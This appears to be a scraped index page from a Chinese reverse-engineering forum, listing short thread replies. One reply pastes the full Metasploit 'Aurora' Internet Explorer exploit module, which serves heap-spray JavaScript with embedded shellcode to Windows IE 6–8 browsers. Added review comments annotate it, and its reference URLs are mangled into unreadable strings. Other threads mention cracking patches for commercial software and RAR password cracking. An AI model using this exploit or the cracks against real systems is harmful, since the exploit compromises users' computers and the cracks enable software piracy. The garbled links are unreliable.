|
|
[求助]上海颐东网络信息有限公司高薪招聘 信息安全开发工程师
原来 YT锅 在这里 |
|
|
|
|
|
C/C++反编译器C-Decompilerv1.1发布
1111111111 |
|
|
[原创].net逆向学习总结系列[2.24更新:.net逆向学习总结002(1)]
建议相关资料归档 打包。 |
|
|
C/C++反编译器C-Decompilerv1.1发布
C-Decompiler.exe C-Decompiler.exe output\ |
|
|
[讨论]做个调查,有分析IE最新极光0day漏洞的吗?
##看到HDM的这个可以确定了 ,世界又要开始新的一轮疯狂了
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#6ccK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3#2W2N6r3q4K6M7r3I4G2K9i4c8Q4x3X3g2U0L8$3#2Q4x3V1k6X3M7X3q4E0k6i4N6G2M7X3E0Q4x3V1j5`.
##
require 'msf/core'
# Metasploit remote-exploit module for the Internet Explorer "Aurora" memory
# corruption flaw (name and description are set in #initialize below).
# The module mixes in the framework's HTML HTTP server and BrowserAutopwn
# support; every client request is answered by #on_request_uri.
#
# Defender notes, limited to what this listing shows:
# * Every JavaScript identifier and the element id in the served page are
#   regenerated on each request, so matching on names is not reliable.
# * The served page always loads an image whose path ends in ".gif" under the
#   module's own resource path, and the HTML response is sent with
#   'Pragma: no-cache'.
# * The declared client range is Internet Explorer 6.0 through 8.0 on Windows
#   with JavaScript enabled (see autopwn_info).
class Metasploit3 < Msf::Exploit::Remote
# Framework ranking constant for this module.
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
# Browser-matching metadata handed to BrowserAutopwn: user agent family,
# version bounds, JavaScript requirement and operating system.
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
# Registers the module's metadata with the framework.
#
# @param info [Hash] caller-supplied module info, merged with the values
#   below through update_info before being passed to super.
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
'Description' => %q{
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown',
'hdm' # Metasploit port
],
'Version' => '$Revision: 8136 $',
'References' =>
[
# NOTE(review): the two URL entries below are not readable as URLs in this
# copy and their closing quote/bracket is missing; they look mangled by the
# hosting page's link rewriting. Restore them from the upstream file.
['URL', '58eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6j5%4u0G2M7$3!0X3N6q4)9J5k6h3y4G2L8g2)9J5c8Y4c8W2j5$3S2F1k6i4c8Q4x3V1k6K6k6h3y4#2M7X3W2@1P5g2)9J5c8X3q4V1N6X3W2K6L8%4u0&6i4K6u0r3z5e0M7&6x3K6f1J5i4K6u0W2L8i4y4H3P5q4)9J5y4#2)9#2c8q4)9J5b7H3`.`.
['URL', 'f14K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6W2M7r3q4%4k6i4c8Q4x3X3g2A6M7$3g2U0L8r3q4T1i4K6u0W2L8%4u0Y4i4K6u0r3N6X3W2W2N6#2)9J5k6i4m8Z5M7q4)9K6c8X3S2S2M7$3S2Q4x3@1b7I4j5h3g2S2x3U0l9$3j5h3p5$3y4r3g2T1k6h3q4T1j5U0l9%4x3U0x3%4k6U0q4W2x3U0t1K6x3r3b7H3k6W2)9J5y4Y4c8&6M7r3g2Q4x3@1c8B7M7#2)9J5y4#2)9#2c8l9`.`.
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
# Payload constraints passed to the framework: size budget, excluded bytes,
# connection-type compatibility and stack adjustment.
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
# A single target with an empty option hash; it is also the default target.
'Targets' =>
[
[ 'Automatic', { }],
],
# NOTE(review): the $Id header of this file is dated 2010-01-15, so the year
# in the date below looks like a typo for 2010 -- confirm against upstream.
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
'DefaultTarget' => 0))
end
# Answers one HTTP request from a client.
#
# Requests whose URI contains ".gif" receive a small GIF image; every other
# request receives the generated HTML/JavaScript page, after which the
# framework's payload handler is invoked for the client.
#
# @param cli the client object supplied by the HTTP server mixin; it is only
#   passed on to send_response, regenerate_payload and handler.
# @param request the incoming request; only request.uri is read here.
# @return nil on the ".gif" branch (bare return); otherwise whatever
#   handler(cli) returns.
def on_request_uri(cli, request)
# The pattern is unanchored and case-insensitive, so any URI that contains
# ".gif" anywhere takes this branch, not only URIs ending in it.
if (request.uri.match(/\.gif/i))
# unpack("m*") base64-decodes the literal; the decoded bytes start with the
# GIF89a signature and describe a 1x1 image.
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
send_response(cli, data, { 'Content-Type' => 'image/gif' })
return
end
# Fresh random names for each JavaScript variable, function and element id
# used in the template below. All are 1..100 alphabetic characters long
# except var_abc, which is always 3 characters.
var_memory = rand_text_alpha(rand(100) + 1)
var_boom = rand_text_alpha(rand(100) + 1)
var_x1 = rand_text_alpha(rand(100) + 1)
var_e1 = rand_text_alpha(rand(100) + 1)
var_e2 = rand_text_alpha(rand(100) + 1)
var_comment = rand_text_alpha(rand(100) + 1);
var_abc = rand_text_alpha(3);
var_ev1 = rand_text_alpha(rand(100) + 1)
var_ev2 = rand_text_alpha(rand(100) + 1)
var_sp1 = rand_text_alpha(rand(100) + 1)
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
# NOTE(review): rand_html and var_e2 are assigned here but not referenced
# anywhere else in this method.
rand_html = rand_text_english(rand(400) + 500)
# Page template (a %Q|...| string, so everything up to the closing "|" is
# literal text with Ruby interpolation; no Ruby comments can go inside it).
# The encoded payload is embedded through
# Rex::Text.to_unescape(regenerate_payload(cli).encoded), and the <img> tag
# requests get_resource + var_start + ".gif", which is served by the branch
# above; its onload attribute calls the function named by var_ev1.
# NOTE(review): the template closes </body></html> twice.
html = %Q|<html>
<head>
<script>
var #{var_comment} = "COMMENT";
var #{var_x1} = new Array();
for (i = 0; i < 200; i ++ ){
#{var_x1} = document.createElement(#{var_comment});
#{var_x1}.data = "#{var_abc}";
};
var #{var_e1} = null;
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
function #{var_boom}() {
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
}
function #{var_ev1}(evt){
#{var_boom}();
#{var_e1} = document.createEventObject(evt);
document.getElementById("#{var_sp1}").innerHTML = "";
window.setInterval(#{var_ev2}, 50);
}
function #{var_ev2}(){
p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
for (i = 0; i < #{var_x1}.length; i ++ ){
#{var_x1}.data = p;
}
var t = #{var_e1}.srcElement;
}
</script>
</head>
<body>
<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>
</body>
</html>
|
# NOTE(review): nothing in this method compresses html; if the response is
# compressed at all, that happens inside send_response -- confirm.
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
# Handle the payload
handler(cli)
end
end
|
|
|
|
|
|
[原创]Red Gate全软件全版本破解补丁
建议Megax 把支持的原版文件一并打包。收藏。 |
|
|
|
|
|
|
|
|
[原创]Symbian_Remote_Debugger_With_IDA
你走弯路了。拷贝手机上安装好的文件到 PC,和对 .net 的分析是一样的。Windows Mobile 上开发的软件,一些是基于 .net framework 精简版的。联机调试,在有源码的时候还不错;真正要去分析二进制文件,还是静态看看吧,不难。元旦放一个简单的 wm crackme 和教程 |
|
|
[活动结束]看雪十周年论坛活动 [1楼已公布结果]
rar密码秒破 |
|
|
|
|
|
|
|
|
|
|
|
[求助]对cater的教程《Symbian S60 3rd Reverse CrAcKiNg Tutorial》的一些问题
ae2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5c8V1q4J5N6r3W2U0L8r3g2Q4x3V1k6e0P5h3#2T1K9h3q4F1i4K6g2X3f1K6j5H3i4K6g2X3x3%4u0V1i4K6g2X3b7i4m8H3L8r3W2U0j5i4c8A6L8$3&6Q4y4h3k6o6M7X3q4U0K9$3W2F1k6#2)9#2k6W2N6A6N6r3S2Q4y4h3k6u0c8p5q4Q4y4h3k6d9k6h3#2G2N6r3g2Q4y4h3k6p5k6h3u0#2k6$3g2J5i4K6g2X3g2s2g2@1L8%4u0A6j5h3I4Q4y4h3k6n7P5g2)9#2k6V1y4S2N6r3g2J5f1h3W2#2i4K6u0W2K9s2c8E0L8q4)9J5k6h3S2@1L8h3H3`. 姑娘,手机号码发我 |
|
|
[讨论]手机系统DIY
楼主举一个,你满意的手机和系统 |
|
|
|
|
|
|
